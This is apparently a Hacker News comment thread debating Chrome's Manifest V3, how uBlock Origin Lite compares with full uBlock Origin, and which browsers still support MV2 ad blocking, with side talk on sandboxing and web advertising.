The firewall works but it's pretty clunky. I'm working on a custom Rust network stack to replace it.

You'd probably prefer something that isn't literally made by one guy and his AIs though. Docker sandboxes seem to be a good solution that also employs virtualization.

https://news.ycombinator.com/item?id=49239751

Before I made all this, I used to use firejail.

colordrops 8 hours ago||||
Don't defend them then. Do you believe the same should be true of your operating system? If not, then it shouldn't be true of the browser either.
matheusmoreira 4 hours ago||
> Do you believe the same should be true of your operating system?

Yes, and I have actually started virtualizing everything inside my computer because of that belief. I don't want random software touching my trusted host.

"Random software" is currently defined as anything outside the official repositories of my Linux distribution of choice. I don't want to share a home directory with such things. I don't want to share a user and its permissions, I don't even want to share a kernel with them.

FeepingCreature 4 hours ago||
There's a difference between you virtualizing programs and your OS vendor virtualizing programs for you without giving you an opt-out. Cough snaps cough.
matheusmoreira 3 hours ago||
Agreed, and I do think it's unfortunate that our browsers are funded by ad tech. I want that to change.
doctorpangloss 9 hours ago||||
Nothing stops people from using a fork with manifest v2 support restored. In fact "VibeChrome" would probably be a successful product.
inigyou 8 hours ago||
First you'd get sued because chrome is a Google trademark
cma 9 hours ago|||
The Google Toolbar for Internet Explorer let users search Google directly from any webpage, block pop-up ads, autofill web forms, and highlight search terms. It also displayed PageRank metrics, translated foreign languages, checked spelling, and managed web bookmarks.
matheusmoreira 9 hours ago||
Imagine the massive amount of data they must have harvested through it.
socalgal2 7 hours ago|||
> Google ... had to ... destroy the APIs so that they're useless.

I see this repeated over and over and yet uBlock Origin Lite still seems to block almost all ads. I'm not saying I wouldn't prefer the non-lite version. But, given I basically still don't see ads it's kind of hard to argue Google destroyed the APIs so that they're useless

aucisson_masque 1 hour ago|||
The crux of the difference is the webRequest API which is only available in Manifest v2. This allows uBlock to strip all tracking data from the requests themselves. So while Chrome w uBlock Lite is hiding almost all the same ads from you, it's not protecting you from tracking

The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads.

fsflover 59 minutes ago||||
> uBlock Origin Lite still seems to block almost all ads

https://news.ycombinator.com/item?id=49305464

what 5 hours ago|||
There’s also ad blockers for iOS safari, which I’m pretty sure doesn’t support ublock. There’s nothing in manifest v2 that’s required for ad blocking.
armadyl 4 hours ago||
uBlock Origin Lite is available on iOS/iPadOS for Safari however last time I checked it’s inferior to AdGuard/Wipr due to the API it uses (it only works in Safari but doesn’t provide ad blocking in the web views like the other two do). Otherwise it’s equivalent with the desktop version.
Gigachad 10 hours ago|||
Browser extensions were also one of the biggest ways to distribute malware. The situation was genuinely horrific. Malware distributors would offer popular extension devs millions of dollars to buy the extension, then silently insert malware which gets auto deployed to millions of people.
underlipton 9 hours ago|||
That sounds more like an issue with the update policies.
inigyou 8 hours ago|||
Why haven't they been prosecuted? And why hasn't this "cindyllm" bot account been deleted yet? Clearly a shadowban didn't send the message.
cindyllm 8 hours ago||
[dead]
inigyou 8 hours ago|||
Firefox extensions are already so incredibly locked down. It used to be they could edit any part of the UI anywhere. Now they each get a button at the end of the URL bar if they're lucky, otherwise it's some obscure hamburger menu item.
tredre3 5 hours ago||
You have full control of whether or not their button is in your toolbar.

If they are hidden for you, it's because you, the user, hid them or enabled the overflow extension menu.

croes 2 hours ago|||
> extensions were supposed to be a way to let you do the things the browser didn't want you to do.

If that would have been the case, extensions wouldn’t exist.

Extension are a way to make the browser do what the browser manufacturer didn’t think or care about.

tomjen3 5 hours ago||
There are good solid reasons why Manifest v3 is preferable for most extensions.

The issue is that adblocking doesn't work with it, so an addition, or workaround should be made, but when Google has the amount of influence they have, that didn't happen.

The upshut is that people hate ads and like free stuff, so there is now a good selling point for Firefox. Hell some of us switched to Firefox because it blocked popup ads and had tabs, back in the day.

armadyl 4 hours ago||
> The issue is that adblocking doesn't work with it

Except this is objectively not true…

uBlock Origin Lite is nearly as good as uBO and blocks nearly everything except for mostly Twitch ads.

Manifest v3 is a big security upgrade and effectively closes off the permanent RCE pathway that v2 allowed.

windowliker 7 hours ago||
I often forget how browsing the web looks for most people. Can't understand why they put up with it, or do they just think that it's part and parcel of the internet to have every page look like a slot machine from hell?
scared_together 54 minutes ago||
I currently don’t use ad blockers. The only time I used ad blockers was when a previous employer specifically asked me to, when using a company machine.

> Can't understand why they put up with it

To see which (rare) sites don’t put up a million ads and actually care about the reading experience.

A lot of the top-listed sites on HN are small blogs without ads (or in the case of danluu.com or lwn.net - without almost any formatting).

daringfireball.net is notable for actually having small, non-intrusive ads that I wouldn’t ever feel the need to block (unless you consider the entire site an ad for Apple but that’s a seperate concern).

> do they just think that it's part and parcel of the internet to have every page look like a slot machine from hell?

It is integral to the business models of the sites putting up those ads. And if those sites don’t make money then they’ll also be unable to pay writers. Much like herd immunity or financial speculation there will always be “somebody else” to watch the ads and essentially subsidize the ad-blocking audience, but I’d rather not be one of those people, I want my usage to be worth the while for the writers.

I am sometimes (rarely) willing to pay for an ad-free experience if I’m a repeat visitor. But more often I’d rather not visit at all if a site is too annoying. Another unfortunate situation is that even if you pay for a subscription, some sites have no ad-free option, such as the New York Times.

The big exception is YouTube, where I visit often, am bombarded with ads but also don’t want to pay Google.

HaloZero 4 hours ago|||
I turned off my adblocker on 404 Media since I wanted to support them, I loaded one new tab in an article and it maxed my CPU at 100% for so long that I paused and had to figure out what was spiking my computer.

Immediately turned it off.

chr15m 7 hours ago|||
Yes, in the same way constant software malfunctions and errors are normal and tolerated.
cpeterso 6 hours ago||
Open your browser’s dev tools while loading a website and there’s usually a continuous stream of HTTP and JS errors and warnings. That websites actually work surprises me sometimes, but that’s the pragmatic beauty of the web.
iammrpayments 5 hours ago|||
Maybe it’s on purpose to keep people addicted to installing apps
loeg 3 hours ago|||
Chome with uBlock Lite looks, uh, pretty similar to Firefox with uBO.
x3n0ph3n3 2 hours ago||
Try visiting YouTube.
lucumo 2 hours ago|||
You try.

uBO Lite blocks ads on YouTube just as well as uBO did.

TiredOfLife 2 hours ago|||
Also on YouTube
flomo 5 hours ago|||
[flagged]
seabrookmx 7 hours ago||
> every page

That's a bit hyperbolic. The areas of the internet I frequent do not have egregious ads (for example, this page). Areas where I really would like good ad-blocking (youtube) are often not covered by these ad blockers. Thankfully Youtube Premium isn't too expensive and solves that issue.

Maybe it's better these days but I always found browser extensions (including uBlock) had a pretty big performance hit, so I've always shied away from them (with the exception of a password manager).

beej71 4 hours ago|||
> Thankfully Youtube Premium isn't too expensive and solves that issue.

True, but some of us refuse to give that company money on principle. The minute I can't watch YouTube without ads is the minute I stop watching YouTube. (The creators I follow make way more money off me on Patreon than Google would ever pay them, anyway.)

> I always found browser extensions (including uBlock) had a pretty big performance hit

I always found that not using uBO was a pretty big performance hit. :)

abdullahkhalids 5 hours ago||||
uBlock causes a huge performance improvement for most regular people's computers.
prmoustache 6 hours ago||||
adblock works well with regular youtube ads (not the one inside the actual content).
username923409 5 hours ago|||
[dead]
eahm 9 hours ago||
Wtf, simply not true:

Brave: chrome://flags/#brave-extensions-manifest-v2 > brave://settings/extensions/v2 > Enable uBlock Origin (Brave-hosted, even better).

Helium comes with uBlock Origin pre-installed.

Edge even still has it https://microsoftedge.microsoft.com/addons/detail/ublock-ori...

And I'm sure others ...I personally only use/test Brave, Brave Origin, Helium and Firefox.

culi 3 hours ago||
Edge is dropping support. Helium is not a major browser.

Brave is the only one that might be considered a valid point. However, because of Chromium dropping support they've had to implement a custom bypass to support Manifest v2 and they are also hosting a version of uBlock Origin for Chromium on their own servers.

It's really questionable how long this state of affairs can go on for. Brave has said they will support it "as long as they are able" but Google could easily just remove the `webRequest` API from Chromium or the engineering burden to keep it alive might just get to be too much

Unfortunately, I think it has an expiration date on any Chromium-based browser.

eahm 50 minutes ago||
Agree on the last part, let’s see for how long.. but for now it’s simply not true.
tech234a 8 hours ago|||
Edge will lose it within the next few months: https://blogs.windows.com/msedgedev/2026/08/07/moving-the-mi...
Scoundreller 5 hours ago|||
RIP corporate users that can't install their own browsers but can install extensions
CSMastermind 3 hours ago|||
Ahh so this will be what moves me off of Edge. Microsoft has almost entirely pushed me out of their ecosystem at this point.
LeoPanthera 9 hours ago|||
The title says "major browser", which none of those are.
Aldo_MX 9 hours ago|||
Brave surely is a major browser with 100+M MAU, not too distant from Firefox with 150+M MAU.
hackernud3s 9 hours ago||
Brave blocks those ads anyway so no point in Ublock, maybe that's why it's left out. It does inject it's own ads though, and then there's all the crypto nonsense.
EbNar 4 hours ago|||
Ads on Brave are opt-in (and not embedded on webpages anyway) and the "crypto nonsense" is a way for them to try to stay afloat without having to accept money from Google and the likes.
hackernud3s 3 hours ago||
Let's hear it then because I'm using Brave and don't see the opt-out.
miladyincontrol 2 hours ago||
https://support.brave.app/hc/en-us/articles/38305898674957-H...

and simply dont use their homepage as your new tab page

ipsum2 8 hours ago|||
Brave adblocking breaks some websites that uBlock Origin doesn't.
brewdad 5 hours ago||
Lately I’ve had better luck with Brave than with FF and UBO, at least one my various banking sites.
ticulatedspline 8 hours ago||||
Technically Firefox isn't a major browser either.
inigyou 8 hours ago||||
Firefox is less popular than some of the browsers you listed as not major, so it isn't major either
loeg 3 hours ago|||
Well, Edge probably counts. I agree about the others.
culi 3 hours ago||
Edge is a major browser but is dropping support
grishka 2 hours ago||
I use Vivaldi and I recently installed an update that disabled my v2 extensions. Had to downgrade and disable update checking.
mikeocool 9 hours ago||
Guess it was a bad idea for everyone to switch to a browser made by one of the world’s biggest advertising companies.
ivraatiems 9 hours ago||
For those who use uBlock Origin Lite, have you noticed any issues/deficiencies in what ads are blocked? I haven't.
jimrandomh 9 hours ago||
I use Firefox with (non-lite) uBlock Origin, and occasionally fire up Chrome (with uBO Lite) for testing. The main issue that I run into is that uBO lite filters can't vary per-domain, so in order to rule out an ad-blocking-false-positive on something I'm developing, I have to turn it off for _all_ sites, not just localhost. (Actual false positives are rare, but needing to check is not so rare.)
tredre3 5 hours ago||
That's not true, the on/off toggle is per-site in uBlock Origin Lite.
socalgal2 7 hours ago|||
I have not really had any issues with ads using uBlock Origin Lite. It's like the complainers live in an alternate reality or just listened to some influencer and never actually checked.

I do miss the rules that let me remove stuff based like CSS like selectors. The strange thing is, even though uBlock Origin Lite doesn't support that feature it's still totally possible to make an extension that does that. Maybe the specific thing uBlock Origin was doing is not possible but making an extension that follows rules and hides/deletes elements with different rules per site is still fully possible under manifest v3

armadyl 3 hours ago||
But you can do this with uBOL? I’m not sure what you mean. I have multiple rules to hide elements on various sites. With HN I hide elements and can give it a custom CSS dark mode through uBOL. Works on both desktop and iOS.
hn_submit 7 hours ago|||
In the short time I've used it I haven't noticed any appreciable difference.
Marsymars 6 hours ago||
I’ve found uBlock Origin Lite (and every other non-uBlock Origin blocker) to struggle with websites using Ad-Shield. (i.e. the entire website breaks.)
tech234a 8 hours ago||
Haven’t tried it but apparently there is an unofficial port of the full version of uBlock Origin to work on manifest v3, the largest challenge being that, on manifest v3, the webRequestBlocking permission is only available to enterprise sideloaded extensions: https://github.com/r58Playz/uBlock-mv3
culi 3 hours ago|
Great but as soon as Google decides to completely strip the `webRequest` API from the codebase, it's game over. Now that it's deprecated it's only a matter of time. This also means Brave, the last Chromium-based browser to support it, will also be unable to support it
WhyNotHugo 1 hour ago||
Qutebrowser seems to _want_ uBlock Origin-style filtering, but development on the feature has been ongoing for a long time and seems to have somewhat stalled: https://github.com/qutebrowser/qutebrowser/pull/7629
firefax 7 hours ago||
You can have my ad blocker when you take it from my cold dead fingers. I will literally move to a shack in the woods rather than go back to late 90s level of bullshit advertising.
zaik 6 hours ago|
> move to a shack in the woods

That's what gemini:// is for.

2b3a51 1 hour ago||
And Dillo is the equivalent of a shepherds hut in the back garden.
imagetic 10 hours ago|
Support Firefox. F** Chrome.
imglorp 8 hours ago||
Seriously.

The web is completely unusable without UBO+FF. Any time I have to use a clean browser, I feel assaulted and dirty, plus wonder what malware just got injected into my machine.

If it were to go away, I would probably accelerate retiring to an analog, offline life.

iLoveOncall 3 hours ago||
I mean did you try with Chrome and Ublock Original Lite? Because I have and there's literally no difference at all.
culi 2 hours ago||
It's different under the hood. The crux of the difference is the webRequest API which is only available in Manifest v2. This allows uBlock to strip all tracking data from the requests themselves. So while Chrome w uBlock Lite is hiding almost all the same ads from you, it's not protecting you from tracking

The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads

nullhole 9 hours ago|||
Fix?
sixtyj 9 hours ago||
Free Chrome. /s
imagetic 9 hours ago||
+1 *
More comments...